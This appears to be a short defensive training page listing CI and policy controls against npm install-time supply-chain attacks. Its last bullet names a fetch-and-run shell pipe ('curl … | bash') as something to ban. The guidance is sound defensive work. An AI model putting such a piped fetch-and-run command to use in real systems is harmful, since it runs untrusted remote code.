Required Reading
~5 min

Mitigations That Actually Work

Practical controls to reduce install‑time attacks and surprise payloads.

CI patterns

  • Commit lockfiles and avoid floating ranges to prevent surprise upgrades.
  • Two‑phase installs: run npm ci --ignore-scripts, then selectively run required build scripts for trusted packages.
  • Run builds/tests in containers with --network=none when feasible to block install‑time exfil.
  • Default CI env: set npm_config_ignore_scripts=true; allowlist specific packages to run scripts.
  • Restrict egress: allow only trusted domains (registry, GitHub Releases/CDN).

Policy & alerts

  • Block merges when risk score > threshold; require human review.
  • Alert on maintainer changes, repo archival, or unusual version churn.
  • Prefer reproducible builds and transparent release process; watch for sudden obfuscation.
  • Require checksum/signature verification for any remote binaries.
  • Enforce allowlist for postinstall usage; ban shell pipes like curl … | bash.